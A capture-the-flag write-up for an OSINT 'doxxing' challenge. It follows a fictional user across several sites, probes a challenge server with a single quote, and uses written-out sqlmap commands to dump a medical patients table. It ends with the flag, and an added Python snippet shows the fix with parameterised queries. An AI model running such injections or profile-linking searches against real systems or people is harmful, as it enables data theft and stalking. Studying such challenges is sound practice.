Dox the Grinch

Authors: Milkdrop, PinkiePie1189

(OSINT Challenge) aka (Open-source intelligence Challenge)

Description of Challenge:

A guy posted that he hates Christmas, and now we need to find his name, surname, city, favorite color, blood type and height (which, in that order, make up the flag for the CTF).
Let's start by following the URL:

https://notabug.io/t/whatever/comments/44530e6b7740f22940db9c176b621900d0bce697/i-hate-xmas

Here you can see a post.

It was posted by the user Domay1986.

Now let's click on the username and see what else he has posted (or submitted, in this case).

Here you can see he has another post, about HackerNews.

Let's follow the post.

Hmmm, he made a HackerNews account, so let's go to Google and search for HackerNews.

Let's go to

https://news.ycombinator.com/

We can see a lot of posts there.

Now, how can we find this guy?

First I clicked on the username of a random user,

Doppp, for instance.

It redirected to https://news.ycombinator.com/user?id=doppp

Then I replaced the id with Domay1986, the poster and the person we are supposed to find:

https://news.ycombinator.com/user?id=Domay1986

Cool, we found the user.

Here we can see his name is Eugene.

Now we have his name, but where do we get the other stuff?

in https://notabug.io/user/uIUP3NZDQVnKkISlVdjM0cSOwt_5EKu1g3CzQGmtTSc.VlYirh-sCV0rZ_6px0em8HWyeKZN8TMnTtY2l0YtoTA

on the overview you can see a post.

He mentioned that he has a Facebook account.

Now let's search for his Facebook account.

I made a lot of attempts, but the search that worked for me was

Eugene (domay)

Why Eugene (domay)?
Eugene was his first name and Domay1986 was his alias. On Facebook, if you search for a person who also has a nickname, you put the nickname in () brackets.

Put it in the search bar,

then search for the person. There you go, you found the guy.

Let's check his posts.

Eugene Clarke is his full name.

Now let's look through all his posts.

Scrolling down, you will see a post.

Hmm, let's check the website; we could get more info about him.

here it redirects you to http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?fbclid=IwAR3cBJGwGQMAyyDWDHSiI1LTTqKlt-r1JI6E-tdVrULRbK3G-lUtTlXDKsM

A database, huh? Let's try SQL injection here.

Type ' in the search bar and hit search.

Boom, it's SQL injectable.
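
Why the single quote breaks the page, and how the lookup should have been written, as an added example (not the challenge's code or the authors'). The table layout, the function names and the use of SQLite are assumptions; the page does not say what the server runs.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a patients table (not the challenge data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE patients (patient_id TEXT, name TEXT, diagnosis TEXT)")
    db.executemany(
        "INSERT INTO patients VALUES (?, ?, ?)",
        [("aaaa1111", "ALICE", "Flu"), ("bbbb2222", "BOB", "Cold")],
    )
    return db

def lookup_vulnerable(db, patient_id):
    # Input is concatenated into the SQL text, so a quote character
    # becomes part of the query's syntax instead of part of the value.
    sql = "SELECT name FROM patients WHERE patient_id = '" + patient_id + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, patient_id):
    # Input is bound as a parameter and is only ever compared as a value.
    sql = "SELECT name FROM patients WHERE patient_id = ?"
    return [row[0] for row in db.execute(sql, (patient_id,))]

def probe(lookup, value):
    """Run one lookup on a fresh database; report rows or the SQL error class."""
    db = make_db()
    try:
        return ("ok", lookup(db, value))
    except sqlite3.Error as exc:
        return ("sql-error", type(exc).__name__)
    finally:
        db.close()

if __name__ == "__main__":
    # The same two inputs against both versions: a valid ID and a lone quote.
    for fn in (lookup_vulnerable, lookup_safe):
        for value in ("bbbb2222", "'"):
            print(fn.__name__, repr(value), probe(fn, value))
```

The concatenated version turns the lone quote into a syntax error, which is the behaviour the search bar showed; the bound version treats it as an ordinary value that matches no row.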

Now let's use sqlmap to list the databases.

I used the command

sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" --dbs

It returned 2 databases.

Now let's see what the ctf database holds,

using the command

sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" -D ctf --tables

Now let's see all the data in the patients table by

running

sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" -D ctf -T patients --dump

You get the dump.

Since sqlmap trims the data, to see all of it you need to

go to /root/.sqlmap/output/challs.xmas.htsp.ro/dump/ctf

There you can see a CSV file.

Now let's open that file; I will use the text editor on Kali Linux.

You can see it holds a lot of data.

Now let's search for the name Eugene.

Here you go:

2107,qxcxdoxmes62pwn5,EUGENE,Caucasian,M,162,110,2207 Kelly Ave PA 18508,CLARKE,1 April 1986,0-,Grinch Syndrome

For a better view, you can copy his patient ID qxcxdoxmes62pwn5 and search for it on the website.

Now we have his name, surname, blood type and body height.

Now all we need is his city and his favorite color.

For his city, let's copy the address 2207 Kelly Ave PA 18508 and google it.

So the city is Scranton.

Now the only thing left to look for is his favorite color.

Let's go back to his Facebook posts and look at his latest post.

Let's maximize the image.

You can see

different tabs open, one of which is Matrimoniale.

Let's search for that.

Since he has talked about Romanian girls on his account, let's go to

matrimoniale.ro

To find a user, the website uses https://www.matrimoniale.ro/ followed by the person's name, so let's look up domay1986.

Let's go to the URL

https://www.matrimoniale.ro/domay1986

Looking through all the tabs there, I found Personal interesting, so let's go to that tab

(scroll down a bit).

Now we have all the information we need:

Name: Eugene

Surname: Clarke

City: Scranton

Color: magenta

Blood group: 0-

Height: 162

Combining these, we get the flag:

X-MAS{eugene_clarke_scranton_magenta_0-_162}